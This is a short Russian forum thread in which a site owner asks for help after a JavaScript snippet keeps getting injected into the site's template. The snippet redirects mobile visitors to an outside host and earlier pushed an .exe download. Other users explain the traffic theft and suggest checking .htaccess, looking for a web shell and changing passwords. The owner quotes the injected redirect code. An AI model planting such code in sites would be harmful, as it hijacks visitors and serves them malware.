Что за вирус?

lott lott  
63
  08.09.2012 17:03       640     Помощь  
В течении уже доброго месяца регулярно на сайте (и в его смартверсии) появляется в хтмл-шаблоне сайта жава-скрипт такого типа: -if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){ window.location = "http://httpupd.com/s/4676" (кусок кода).При открытии самого сайта автоматически скачивался на компьютер пользователя файл exe, сейчас после запрета на такого типа файлы не скачивается, однако регулярно продолжают вживлять скрипт в тело сайта.
Пострадают ли позиции сайта из-за вируса?
Сайт на ДЛЕ. Обновления движка и смена кода к фтп не принесли пользы.
Посоветуйте что-то.

Ответы на пост (5) Написать ответ
bande bande
72
08.09.2012 17:04
воруют мобильный трафик гадики.
0
lott lott
63
08.09.2012 17:07
И как с этим бороться?
0
bande bande
72
08.09.2012 17:35
разумеется, удалением.
0
rastra rastra
14
08.09.2012 17:40
Поправь файл HTACCESS в корне сайта...
0
mihailsolnce mihailsolnce
91
08.09.2012 18:41
Значит есть другие лазейки. Данный скрипт редиректит мобильный трафик на какой-нибудь обманный платник. Злоумышленникам его целесообразно ставить на сайт с большой посещаемостью.
Если не фтп: значит другие лазейки. Шелл может быть, также пароль к почте сменить и т.п.
1